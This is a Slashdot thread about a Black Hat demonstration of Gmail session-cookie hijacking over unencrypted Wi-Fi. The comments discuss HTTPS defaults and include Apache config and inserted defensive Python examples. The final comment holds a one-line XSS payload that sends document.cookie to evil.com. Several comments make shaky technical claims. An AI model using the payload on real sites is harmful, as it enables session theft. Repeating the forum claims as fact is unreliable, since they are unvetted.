Slashdot Mirror


Point-and-Click Gmail Hacking Shown at Black Hat

not5150 writes "Using Gmail or most other webmail programs over an unsecured access point just got a bit more dangerous. At Black Hat, Robert Graham, CEO of Errata Security, showed how to capture and clone session cookies very quickly over connections without encryption. He even hijacked a shocked attendee's Gmail account in the middle of his presentation. 'While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google. Graham then clicked on Ou's IP address and Gmail page, complete with Ou's recently sent message on the screen. We photographed both Graham's and Ou's laptop at that time and posted it to the picture gallery. You'll see that the contents are exactly the same.'"

25 of 260 comments

  1. Good reason to install Better GMail! by Mr. X · Score: 3, Informative
    1. Re:Good reason to install Better GMail! by afidel · Score: 4, Informative

      I think you should have linked to the Mozilla addons page. I know I wouldn't install a firefox addon from a random site with the name hacker in the URL.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  2. Correct me if I'm wrong but by trifish · Score: 4, Informative

    Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a different IP address, so the cookie is rejected as invalid. The only situation where this solution may get a bit annoying is if you're behind a load-balancing proxy, which changes your IP address on every request (fortunately, this is somewhat rare). It's better than allowing easy hijacks...

    1. Re:Correct me if I'm wrong but by vidarlo · Score: 3, Informative

      Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a different IP address, so the cookie is rejected as invalid.
      More often than not, all users of a wireless net are behind a NAT device, which gives all the devices the same official IP. The same applies to most domestic, workplace and school wlans, so really, that would make little or no difference. Now, in an IPv6 world, it would make a difference, since everyone has a unique IP there...
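The IP-binding proposed above and the NAT objection to it, worked through in code. This is an added example, not code from the thread or from Google; the HMAC-tagged cookie format, the server key and the client addresses are all constructed for the demo. The server binds the cookie to the address it observes, so two clients behind one NAT are indistinguishable.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side key, constructed fresh for this demo process.
SERVER_KEY = secrets.token_bytes(32)

def issue_cookie(session_id: str, client_ip: str) -> str:
    """Bind a session id to the IP the server sees by appending an HMAC tag."""
    msg = f"{session_id}|{client_ip}".encode()
    tag = hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()
    return f"{session_id}.{tag}"

def cookie_is_valid(cookie: str, client_ip: str) -> bool:
    """Recompute the tag with the IP of the current request; any mismatch fails."""
    session_id, _, tag = cookie.rpartition(".")
    if not session_id:
        return False
    msg = f"{session_id}|{client_ip}".encode()
    expected = hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)

def ip_seen_by_server(client: dict) -> str:
    """What the web server observes: the NAT's public address if there is one."""
    return client.get("nat_public_ip") or client["ip"]

# Constructed clients: victim and a neighbour share one wireless LAN behind one NAT;
# the remote client models a different network (or a load-balancing proxy that
# changed the legitimate user's address, the annoyance mentioned in the parent).
VICTIM = {"ip": "192.168.1.20", "nat_public_ip": "203.0.113.10"}
NEIGHBOR = {"ip": "192.168.1.99", "nat_public_ip": "203.0.113.10"}
REMOTE = {"ip": "198.51.100.7"}

def replay_outcomes() -> dict:
    """Present the victim's cookie from several vantage points and record the verdicts."""
    cookie = issue_cookie("s-" + secrets.token_hex(8), ip_seen_by_server(VICTIM))
    tampered = cookie[:-1] + ("0" if cookie[-1] != "0" else "1")  # flip one tag char
    return {
        "victim": cookie_is_valid(cookie, ip_seen_by_server(VICTIM)),
        "same_nat": cookie_is_valid(cookie, ip_seen_by_server(NEIGHBOR)),
        "other_network": cookie_is_valid(cookie, ip_seen_by_server(REMOTE)),
        "tampered": cookie_is_valid(tampered, ip_seen_by_server(VICTIM)),
    }

if __name__ == "__main__":
    print(replay_outcomes())
```

Binding rejects replay from another network and any edited tag, but accepts the same cookie from every host behind the victim's NAT, which is the point vidarlo makes.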
  3. Re:Slow News day? by andrewd18 · Score: 1, Informative

    This is the first time it's been compiled into an automated tool. Note that this tool doesn't apply to just GMail, but any web service that uses a cookie, when the user is on an unencrypted wireless network.

    Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.

  4. Re:Could be fixed easily by Google. Shame. by Anonymous Coward · Score: 1, Informative

    Gmail already supports ssl. Just use https instead of http in the url.

  5. Re:Could be fixed easily by Google. Shame. by ohearn · Score: 1, Informative

    Gmail will use SSL over any browser, it just doesn't by default (which is a shame, but easily fixed for those of us that care)

  6. Re:Could be fixed easily by Google. Shame. by SatanicPuppy · Score: 4, Informative

    They offer it. All you have to do is go to https://mail.google.com/ rather than http://mail.google.com/

    I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.

    --
    ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
  7. Bottom line by Kadin2048 · Score: 5, Informative

    I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

    It's more of an indictment of Google than anything, because they default to unencrypted HTTP rather than HTTPS, and most users won't know that they can go to https://mail.google.com/mail/ to force smarter behavior.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    1. Re:Bottom line by It'sYerMam · Score: 4, Informative

      And furthermore, if you use google via a customised google page (http://www.google.com/ig) then even if you redirect that to https://.../ then the link to GMail is still regular http.

      --
      im in ur .sig, writin ur memes.
  8. Re:Slow News day? by Anonymous Coward · Score: 5, Informative

    if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.
    You have no idea how SSL works.
  9. Re:Could be fixed easily by Google. Shame. by Bob 535604 · Score: 5, Informative

    I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.
    A lot of people wouldn't know about this or even look for it and you know it. Google could make https the default or even mandatory, and it would completely kill this entire issue.
  10. Re:Slow News day? by The Velour Fog · Score: 4, Informative

    Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.
    SSL uses Diffie-Hellman key exchange so no unencrypted key is ever sent
  11. Always use https://gmail.google.com by StandardCell · Score: 2, Informative

    Although they don't have a public key scheme strong enough for the AES-256 (requires 15360-bit RSA or 256-bit ECC for public key), you should always be logging in using https://gmail.google.com/ from all locations (even home) to ensure the entire session is encrypted.

  12. Re:Slow News day? by Kartoffel · Score: 5, Informative

    That's easy enough to fix with a Firefox plugin: http://www.customizegoogle.com/

  13. Re:Could be fixed easily by Google. Shame. by teknopurge · Score: 2, Informative

    We have redirects set up on all plain-text channels that have a login to SSL, and have for the past 6 years; this is beyond common sense.

  14. Re:Could be fixed easily by Google. Shame. by huge · Score: 2, Informative

    Shame on them also?
    Yes.

    Even if there are others with the same problem, that doesn't give you an excuse to ignore the problem.
    --
    Reality checks don't bounce.
  15. Easy fix by teslatug · Score: 2, Informative

    Bookmark the secure address and use that (who wouldn't over open wireless??). You could also use http://www.customizegoogle.com/ with Firefox if you're using Gmail to force it to go to the secure URL.

  16. use gmail over https by buddyglass · Score: 1, Informative

    Accessing http://gmail.google.com/ will redirect you to a secure page for login, but after that you're back in plain text. If you start at https://gmail.google.com/ then afaik the rest of your gmail session runs over SSL.
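The pattern buddyglass describes (an https login that then drops back to plain http) is exactly the case where a session cookie needs the Secure attribute, or the browser will resend it in the clear on the next http request. Below is an added audit helper, not code from the thread or from Google, that flags Set-Cookie headers lacking Secure or HttpOnly or issued over http; the hostnames, cookie names and headers are constructed for the demo.

```python
from urllib.parse import urlsplit

def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flags like Secure map to ""
    return name.strip(), value.strip(), attrs

def audit_set_cookie(response_url: str, header: str) -> list:
    """List the ways this cookie can reach a sniffer on an unencrypted network."""
    name, _, attrs = parse_set_cookie(header)
    problems = []
    if "secure" not in attrs:
        problems.append(f"{name}: no Secure flag, browser will resend it over plain http")
    if "httponly" not in attrs:
        problems.append(f"{name}: no HttpOnly flag, readable via document.cookie")
    if urlsplit(response_url).scheme != "https":
        problems.append(f"{name}: set over http, value already exposed on the wire")
    return problems

def audit_exchange(exchange) -> list:
    """Audit a list of (response URL, Set-Cookie header) pairs from one session."""
    findings = []
    for url, header in exchange:
        findings.extend(audit_set_cookie(url, header))
    return findings

# Constructed exchanges: the https-login-then-http-session pattern, and a hardened one.
LOGIN_THEN_PLAIN = [
    ("https://mail.example.test/accounts/login", "SID=abc123; Domain=.example.test; Path=/"),
    ("http://mail.example.test/mail/", "PREF=ui1; Path=/; Expires=Tue, 01 Jan 2030 00:00:00 GMT"),
]
HARDENED = [
    ("https://mail.example.test/accounts/login",
     "SID=abc123; Domain=.example.test; Path=/; Secure; HttpOnly"),
]

if __name__ == "__main__":
    for finding in audit_exchange(LOGIN_THEN_PLAIN):
        print(finding)
    print("hardened findings:", audit_exchange(HARDENED))
```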

  17. Re:psh by Anonymous Coward · Score: 1, Informative

    Go home, Dad, you're pissed.

  18. Re:Slow News day? by Aeiri · Score: 2, Informative

    This is the first time it's been compiled into an automated tool.
    No it's not, there's another that's better and it's been around for a long while. It was once Ethereal, and now called Wireshark.
  19. Make it default to https by ajs318 · Score: 3, Informative

    #  This is how I did it:
    #
    #  Actual snippet from my Apache configuration .....  mostly.
    #  Some details have been changed to protect the innocent
    #  And some details have been changed to protect the guilty
    #
    #  The virtual host "secure.mydomain.co.uk" cannot be accessed
    #  by http; only by https.
    #
    #  The insecure port
    <VirtualHost 10.11.12.13:80>
        ServerName secure.mydomain.co.uk
        DocumentRoot /var/www/
        <Directory /var/www/>
            RedirectMatch ^/(?![iI]) /insecure/
            # In this directory is a page with a dire warning
            # that https is required to access this server.
            # NB.  To avoid creating an infinite loop, we never
            # redirect if request begins with I or i.  The negative
            # lookahead (rather than [^iI]) also catches a bare "/".
        </Directory>
    </VirtualHost>
    #  The secure port
    <VirtualHost 10.11.12.13:443>
        SSLEngine on
        .....
    </VirtualHost>

    --
    Je fume. Tu fumes. Nous fûmes!
  20. Re:Slow News day? by gpuk · Score: 4, Informative

    That is the correct behaviour.

    Essentially, if you enter via http://mail.google.com/ Google remembers this and encrypts only the login process and then reverts back to plain text. If you enter via https://mail.google.com/ your session remains encrypted throughout.

  21. Another Extension by lupine · Score: 2, Informative

    I use the Gmail Notifier Firefox extension which checks for messages and forces gmail to use secure connections.

  22. re: Yes it is by Anonymous Coward · Score: 1, Informative

    1- Robert did not release this tool to the public.
    2- Automatic HTTP session hijacking tools have existed for 7+ years.

    (new Image()).src= "http://evil.com/?"+document.cookie